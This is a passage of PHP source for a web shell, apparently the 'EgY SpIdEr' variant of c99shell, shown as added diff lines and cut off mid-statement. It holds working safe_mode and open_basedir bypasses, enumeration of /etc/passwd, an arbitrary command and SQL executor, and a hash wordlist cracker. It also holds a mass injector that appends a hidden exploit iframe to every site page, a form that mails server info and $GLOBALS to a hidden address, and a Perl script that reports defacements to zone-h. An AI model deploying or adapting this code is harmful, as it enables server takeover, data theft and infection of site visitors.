'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'mSQL': + $this->dump[0] = '## mSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'SQLite': + $this->dump[0] = '## SQLite dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + default: + return 0; + break; + } + return 1; + } + function close() + { + switch($this->db) + { + case 'MySQL': + @mysql_close($this->connection); + break; + case 'MSSQL': + @mssql_close($this->connection); + break; + case 'PostgreSQL': + @pg_close($this->connection); + break; + case 'Oracle': + @oci_close($this->connection); + break; + case 'MySQLi': + @mysqli_close($this->connection); + break; + case 'mSQL': + @msql_close($this->connection); + break; + case 'SQLite': + @sqlite_close($this->connection); + break; + } + } + function affected_rows() + { + switch($this->db) + { + case 'MySQL': + return @mysql_affected_rows($this->res); + break; + case 'MSSQL': + return @mssql_affected_rows($this->res); + break; + case 'PostgreSQL': + return @pg_affected_rows($this->res); + break; + case 'Oracle': + return @ocirowcount($this->res); + break; + case 'MySQLi': + return @mysqli_affected_rows($this->res); + break; + case 'mSQL': + return @msql_affected_rows($this->res); + break; + case 'SQLite': + return @sqlite_changes($this->res); + break; + default: + return 0; + break; + break; +case 'cURL': + if(empty($_POST['egy_spider'])){ + + +} else { +$curl=$_POST['egy_spider']; +$ch =curl_init("file:///".$curl."\x00/../../../../../../../../../../../../".__FILE__); +curl_exec($ch); +var_dump(curl_exec($ch)); +echo "</textarea></CENTER>"; + +} +break; +case 'copy': + +if(empty($snn)){ +if(empty($_GET['snn'])){ +if(empty($_POST['snn'])){ + +} else { +$u1p=$_POST['snn']; +} +} else { +$u1p=$_GET['snn']; +} +} + $u1p=""; // File to Include... or use _GET _POST +$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp + + +$temp=tempnam($tymczas, "cx"); + +if(copy("compress.zlib://".$snn, $temp)){ +$zrodlo = fopen($temp, "r"); +$tekst = fread($zrodlo, filesize($temp)); +fclose($zrodlo); +echo "".htmlspecialchars($tekst).""; +unlink($temp); +echo "</textarea></CENTER>"; +} +break; +case 'ini_restore': + if(empty($_POST['ini_restore'])){ +} else { + +$ini=$_POST['ini_restore']; +echo ini_get("safe_mode"); +echo ini_get("open_basedir"); +require_once("$ini"); +ini_restore("safe_mode"); +ini_restore("open_basedir"); +echo ini_get("safe_mode"); +echo ini_get("open_basedir"); +include($_GET["egy"]); +echo "</textarea></CENTER>"; +} +break; +case 'glob': +function reg_glob() +{ +$chemin=$_REQUEST['glob']; +$files = glob("$chemin*"); + + +foreach ($files as $filename) { + + echo "$filename\n"; + +} +} + +if(isset($_REQUEST['glob'])) +{ +reg_glob(); +} + +break; + case 'sym1': + if(empty($_POST['sym1p'])){ + } else { +$symp=$_POST['sym1p']; + } + if(empty($_POST['sym1p2'])){ + +} else { +$symp2=$_POST['sym1p2']; + + symlink("a/a/a/a/a/a/", "dummy"); +symlink("dummy".$symp2."".$symp."", "xxx"); +unlink("dummy"); +while (1) { +symlink(".", "dummy"); + + } + } + break; + case 'sym2': + @include(xxx); + + break; + case 'plugin': + if ($_POST['plugin'] ){ + + + for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd + $ara = posix_getpwuid($uid); + if (!empty($ara)) { + while (list ($key, $val) = each($ara)){ + print "$val:"; + } + print "\n"; + } + } + echo "</textarea>"; + } + + } + } + } +if(isset($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) + { + if($file=moreread($_POST['d_name'])){ $filedump = $file; } + else if ($file=readzlib($_POST['d_name'])) { $filedump = $file; } else { err(1,$_POST['d_name']); $_POST['cmd']=""; } + if(!empty($_POST['cmd'])) + { + @ob_clean(); + $filename = @basename($_POST['d_name']); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } + header("Content-type: ".$mime_type); + header("Content-disposition: attachment; filename=\"".$filename."\";"); + echo $filedump; + exit(); + } + } +if(isset($_GET['1'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); } +if (isset($_POST['cmd']) && $_POST['cmd']=="db_query") + { + echo $head; + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + $querys = @explode(';',$_POST['db_query']); + echo '<body bgcolor=#e4e0d8>'; + if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>"; + else + { + if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>"; + else + { + foreach($querys as $num=>$query) + { + if(strlen($query)>5) + { + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; + switch($sql->query($query)) + { + case '0': + echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>"; + break; + case '1': + if($sql->get_result()) + { + echo "<table width=100%>"; + foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;", $sql->columns); + echo "<tr><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + for($i=0;$i<$sql->num_rows;$i++) + { + foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]); + echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>'; + } + echo "</table>"; + } + break; + case '2': + $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); + echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; + break; + } + } + } + } + } + echo "<br><form name=form method=POST>"; + echo in('hidden','db',0,$_POST['db']); + echo in('hidden','db_server',0,$_POST['db_server']); + echo in('hidden','db_port',0,$_POST['db_port']); + echo in('hidden','mysql_l',0,$_POST['mysql_l']); + echo in('hidden','mysql_p',0,$_POST['mysql_p']); + echo in('hidden','mysql_db',0,$_POST['mysql_db']); + echo in('hidden','cmd',0,'db_query'); + echo "<div align=center>"; + echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>"; + echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; + echo "</form>"; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); + } +if(isset($_GET['12'])) + { + @unlink(__FILE__); + } +if(isset($_GET['11'])) + { + @unlink($tempdir.'bdpl'); + @unlink($tempdir.'back'); + @unlink($tempdir.'bd'); + @unlink($tempdir.'bd.c'); + @unlink($tempdir.'dp'); + @unlink($tempdir.'dpc'); + @unlink($tempdir.'dpc.c'); + @unlink($tempdir.'prxpl'); + @unlink($tempdir.'grep.txt'); + } +if(isset($_GET['2'])) +{ +echo $head; +function U_value($value) + { + if ($value == '') return '<i>no value</i>'; + if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; + if ($value === null) return 'NULL'; + if (@is_object($value)) $value = (array) $value; + if (@is_array($value)) + { + @ob_start(); + print_r($value); + $value = @ob_get_contents(); + @ob_end_clean(); + } + return U_wordwrap((string) $value); + } +function U_wordwrap($str) + { + $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); + return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); + } +if (@function_exists('ini_get_all')) + { + $r = ''; + echo '<table width=100%>', '<tr><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>'; + foreach (@ini_get_all() as $key=>$value) + { + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>'; + } + echo $r; + echo '</table>'; + } +echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; +die(); +} +if(isset($_GET['3'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>'; + $cpuf = @file("cpuinfo"); + if($cpuf) + { + $c = @sizeof($cpuf); + for($i=0;$i<$c;$i++) + { + $info = @explode(":",$cpuf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; + die(); + } +if(isset($_GET['4'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; + die(); + } + + + + + if(isset($_GET['tool'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); } + if(isset($_GET['tools'])) { /*########################################### +code 2 +###########################################*/ +?> +<html> +<head><title>EgY SpIdEr ShElL</title></head> +<STYLE> + +BODY + { + SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #666666; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456 +} + +table { +BORDER: #eeeeee outset; +BACKGROUND-COLOR: #000000; +color: #dadada; +} +input { +BORDER-RIGHT: #00FF00 1 solid; +BORDER-TOP: #00FF00 1 solid; +BORDER-LEFT: #00FF00 1 solid; +BORDER-BOTTOM: #00FF00 1 solid; +BACKGROUND-COLOR: #333333; +font: 9pt tahoma; +color: #ffffff; +} + +submit { +BORDER: buttonhighlight 1 outset; +BACKGROUND-COLOR: #272727; +width: 40%; +color: #dadada; +} +textarea { +BORDER-RIGHT: #ffffff 1 solid; +BORDER-TOP: #999999 1 solid; +BORDER-LEFT: #999999 1 solid; +BORDER-BOTTOM: #ffffff 1 solid; +BACKGROUND-COLOR: #333333; +font: Fixedsys bold; +color: #ffffff; +} +BODY { +margin: 1; +color: #dadada; +background-color: #000000; +} +A:link {COLOR:red; TEXT-DECORATION: none} +A:visited { COLOR:red; TEXT-DECORATION: none} +A:active {COLOR:red; TEXT-DECORATION: none} +A:hover {color:blue;TEXT-DECORATION: none} + +</STYLE> +</body> +</html> +<? +$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd(); +$sf="<form method=post>";$ef="</form>"; +$st="<table style=\"border:1px #dadada solid \" width=100% height=100%>"; +$et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">"; +$c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>"; +$sta="<textarea cols=157 rows=23>";$eta="</textarea>"; +$sfnt="<font face=tahoma size=2 color=#008080>";$efnt="</font>"; +error_reporting(0); +set_magic_quotes_runtime(0); + +if(version_compare(phpversion(), '4.1.0') == -1) + {$_POST = &$HTTP_POST_VARS;$_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + }function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"]; +if (strstr ($requ,$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr ($requ,"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);} +elseif (strstr ($requ,"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr($requ,"?")){return $requ."&".$link."=".$val;} +else{return $requ."?".$link."=".$val;}} +function delm($delmtxt){print"<center><table bgcolor=black style='border:1px solid olive' width=99% height=2%>";print"<tr><td><b><center><font size=2 color=olive>$delmtxt</td></tr></table></center>";} +function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd); +$nscmd=htmlspecialchars($scmd);print $nscmd;} +elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd); +$ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;} +elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r"); +while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));; +print $res;}pclose($pcmd);}elseif(!function_exists(popen)){ +ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){ +ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean(); +print htmlspecialchars($pret);}} +function input($type,$name,$value,$size) +{if (empty($value)){print "<input type=$type name=$name size=$size>";} +elseif(empty($name)&&empty($size)){print "<input type=$type value=$value >";} +elseif(empty($size)){print "<input type=$type name=$name value=$value >";} +else {print "<input type=$type name=$name value=$value size=$size >";}} +function permcol($path){if (is_writable($path)){print "<font color=olive>"; +callperms($path); print "</font>";} +elseif (!is_readable($path)&&!is_writable($path)){print "<font color=red>"; +callperms($path); print "</font>";} +else {print "<font color=white>";callperms($path);}} +if ($dlink=="dwld"){download($_REQUEST['dwld']);} +function download($dwfile) {$size = filesize($dwfile); +@header("Content-Type: application/force-download;name=$dwfile"); +@header("Content-Transfer-Encoding: binary"); +@header("Content-Length: $size"); +@header("Content-Disposition: attachment; filename=$dwfile"); +@header("Expires: 0"); +@header("Cache-Control: no-cache, must-revalidate"); +@header("Pragma: no-cache"); +@readfile($dwfile); exit;} +?> +<? +$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd(); + +$sf="<form method=post>";$ef="</form>"; +$st="<table style=\"border:1px #dadada solid \" width=100% height=100%>"; +$et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">"; +$c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>"; +$sta="<textarea cols=157 rows=23>";$eta="</textarea>"; +$sfnt="<font face=tahoma size=2 color=olive>";$efnt="</font>"; +################# Ending of common variables ######################## + +print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<b><center><font face=tahoma color=white size=4> +</font></b></center>"; print"</td></tr>";print"</table>";print "<br>"; +print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<center><div><b>";print ""; + +if ($act == 'encoder') +{ + echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>"; + foreach(array("md5","crypt","sha1","crc32") as $v) + { + echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>"; + } + echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly> + <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly> + <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>"; + echo "<center>base64_decode - "; + if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";} + else + { + $debase64 = base64_decode($encoder_input); + $debase64 = str_replace("\0","[0]",$debase64); + $a = explode("\r\n",$debase64); + $rows = count($a); + $debase64 = htmlspecialchars($debase64); + if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";} + else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";} + echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>"; + } + echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\""; + $c = strlen($encoder_input); + for($i=0;$i<$c;$i++) + { + $hex = dechex(ord($encoder_input[$i])); + if ($encoder_input[$i] == "&") {echo $encoder_input[$i];} + elseif ($encoder_input[$i] != "\\") {echo "%".$hex;} + } + echo "\" readonly><br></form>"; + +?> +</center> +<br><br> +<table border=0 align=center cellpadding=4> +<tr><td> +<center><b>Search milw0rm for MD5 hash</b></center> +</td><td> +<center><b>Search md5encryption.com for MD5 or SHA1 hash</b></center> +</td><td> +<center><b>Search CsTeam for MD5 hash</b></center> +</td></tr> +<tr><td> +<center> +<form target="_blank" action="http://www.milw0rm.com/cracker/search.php" method=POST> +<input type=text size=40 name=hash> <input type=submit value="Submit"></form> +</center> +</td><td> +<center> +<form target="_blank" action="http://www.md5encryption.com/?mod=decrypt" method=POST> +<input type=text size=40 name=hash2word> <input type=submit value="Submit"></form> +</center> +</td><td> +<center> +<form target="_blank" action="http://www.csthis.com/md5/index.php" method=POST> +<input type=text size=40 name=h> <input type=submit value="Submit"></form> +</center> +</td></tr> +</table> +<br> +<center> +<?php +// my wordlist cracker ^_^ +if (isset($_GET['hash']) && isset($_GET['wordlist']) && ($_GET['type'] == 'md5' || $_GET['type'] == 'sha1')) { + $type = $_GET['type']; + $hash = $_GET['hash']; + $count = 1; + $wordlist = file($_GET['wordlist']); + $words = count($wordlist); + foreach ($wordlist as $word) { + echo $count.' of '.$words.': '.$word.'<br>'; + if ($hash == $type(rtrim($word))) { + echo '<font color=red>Great success! The password is: '.$word.'</font><br>'; + exit; + } + ++$count; + } +} + +} +if ($act == 'fsbuff') +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";} + else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} +} +if ($act == "selfremove") +{ + if (($submit == $rndcode) and ($submit != "")) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } + else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} + } + else + { + if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";} + $rnd = rand(0,9).rand(0,9).rand(0,9); + echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>"; + } +} +if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}} +if ($act == "feedback") +{ + $suppmail = base64_decode("ZWd5X3NwaWRlckBob3RtYWlsLmNvbQ=="); + if (!empty($submit)) + { + $ticket = substr(md5(microtime()+rand(1,1000)),0,6); + $body = "egy_spider v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\nE-server: ".htmlspecialchars($_SERVER['REQUEST_URI'])."\nE-server2: ".htmlspecialchars($_SERVER["SERVER_NAME"])."\n\nIP: ".$REMOTE_ADDR; + if (!empty($fdbk_ref)) + { + $tmp = @ob_get_contents(); + ob_clean(); + phpinfo(); + $phpinfo = base64_encode(ob_get_contents()); + ob_clean(); + echo $tmp; + $body .= "\ni"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; + } + mail($suppmail,"egy_spider v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); + echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>"; + } + else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>If you want to send a request for any help I know I will respond to you in case <br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: Arbic, English.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";} +} + +if ($act == 'massbrowsersploit') { +?> +<b>Mass Code Injection:</b><br><br> +Use this to add HTML to the end of every .php, .htm, and .html page in the directory specified.<br><br> +<form action="<?php echo $surl; ?>" method=GET> +<input type=hidden name="masssploit" value="goahead"> +<input type=hidden name="act" value="massbrowsersploit"> +<table border=0> +<tr><td>Dir to inject: </td><td><input type=text size=50 name="pathtomass" value="<?php echo realpath('.'); ?>"> <-- default is dir this shell is in</td></tr> +<tr><td>Code to inject: </td><td><textarea name="injectthis" cols=50 rows=4><?php echo htmlspecialchars('<IFRAME src="http://www.egyspider.eu" width=0 height=0 frameborder=0></IFRAME>'); ?></textarea> <-- best bet would be to include an invisible iframe of browser exploits</td></tr> +<tr><td><input type=submit value="Inject Code"></td></tr> +</table> +</form> +<?php +if ($_GET['masssploit'] == 'goahead') { + if (is_dir($_GET['pathtomass'])) { + $lolinject = $_GET['injectthis']; + foreach (glob($_GET['pathtomass']."/*.php") as $injectj00) { + $fp=fopen($injectj00,"a+"); + if (fputs($fp,$lolinject)){ + echo $injectj00.' was injected<br>'; + } else { + echo '<font color=red>failed to inject '.$injectj00.'</font>'; + } + } + foreach (glob($_GET['pathtomass']."/*.htm") as $injectj00) { + $fp=fopen($injectj00,"a+"); + if (fputs($fp,$lolinject)){ + echo $injectj00.' was injected<br>'; + } else { + echo '<font color=red>failed to inject '.$injectj00.'</font>'; + } + } + foreach (glob($_GET['pathtomass']."/*.html") as $injectj00) { + $fp=fopen($injectj00,"a+"); + if (fputs($fp,$lolinject)){ + echo $injectj00.' was injected<br>'; + } else { + echo '<font color=red>failed to inject '.$injectj00.'</font>'; + } + } + } else { //end if inputted dir is real -- if not, show an ugly red error + echo '<b><font color=red>'.$_GET['pathtomass'].' is not available!</font></b>'; + } // end if inputted dir is real, for real this time +} // end if confirmation to mass sploit is go +} // end if massbrowsersploit is called + + + +if ($dlink=='showsrc'){ +print "<p><b>: Choose a php file to view in a color mode, any extension else will appears as usual :";print "<form method=get>"; +input ("text","tools&dlink=showsrc","",35);print " "; +input ("hidden","scdir",$scdir,22);input ("submit","tools&dlink=showsrc","Show-src","");print $ef; die();}if(isset($_REQUEST['tools&dlink=showsrc'])){callshsrc(trim($_REQUEST['showsc']));} +if (isset($_REQUEST['indx'])&&!empty($_REQUEST['indxtxt'])) +{if (touch ($_REQUEST['indx'])==true){ +$fp=fopen($_REQUEST['indx'],"w+");fwrite ($fp,stripslashes($_REQUEST['indxtxt'])); +fclose($fp);print "<p>[ $sfnt".$_REQUEST['indx']."$efnt created successfully !! ]</p>";print "<b><center>[ <a href='javascript:history.back()'>Edit again</a> +] -- [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</center></b>";die(); }else {print "<p>[ Sorry, Can't create the index !! ]</p>";die();}} +if ($dlink=='qindx'&&!isset($_REQUEST['qindsub'])){ +print $sf."<br>";print "<p><textarea cols=50 rows=10 name=indxtxt> +Your index contents here</textarea></p>"; +input ("text","indx","Index-name",35);print " "; +input ("submit","qindsub","Create","");print $ef;die();} +if (isset ($_REQUEST['mailsub'])&&!empty($_REQUEST['mailto'])){ +$mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt']; +if (mail($mailto,$subj,$mailtxt)){print "<p>[ Mail sended to $sfnt".$mailto." $efnt successfully ]</p>"; die();}else {print "<p>[ Error, Can't send the mail ]</p>";die();}} elseif(isset ($mailsub)&&empty($mailto)) {print "<p>[ Error, Can't send the mail ]</p>";die();} +if ($dlink=='mail'&&!isset($_REQUEST['mailsub'])){ +print $sf."<br>";print "<p><textarea cols=50 rows=10 name=mailtxt> +Your message here</textarea></p>";input ("text","mailto","example@mail.com",35);print " ";input ("text","subj","Title-here",20);print " "; +input ("submit","mailsub","Send-mail","");print $ef;die();} +if (isset($_REQUEST['zonet'])&&!empty($_REQUEST['zonet'])){callzone($nscdir);} +function callzone($nscdir){ +if (is_writable($nscdir)){$fpz=fopen ("z.pl","w");$zpl='z.pl';$li="bklist.txt";} +else {$fpz=fopen ("/tmp/z.pl","w");$zpl='/tmp/z.pl';$li="/tmp/bklist.txt";} +fwrite ($fpz,"\$arq = @ARGV[0]; +\$grupo = @ARGV[1]; +chomp \$grupo; +open(a,\"<\$arq\"); +@site = <a>; +close(a); +\$b = scalar(@site); +for(\$a=0;\$a<=\$b;\$a++) +{chomp \$site[\$a]; +if(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; } +print \"[+] Sending \$site[\$a]\n\"; +use IO::Socket::INET; +\$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next; +print \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\"; +print \$sock \"Accept: */*\r\n\"; +print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\"; +print \$sock \"Accept-Language: pt-br\r\n\"; +print \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\"; +print \$sock \"Connection: Keep-Alive\r\n\"; +print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\"; +print \$sock \"Host: old.zone-h.org\r\n\"; +print \$sock \"Content-Length: 385\r\n\"; +print \$sock \"Pragma: no-cache\r\n\"; +print \$sock \"\r\n\"; +print \$sock \"notify_defacer=\$grupo&notify_domain=http%3A%2F%2F\$site[\$a]&notify_hackmode=22&notify_reason=5&notify=+OK+\r\n\"; +close(\$sock);}"); +if (touch 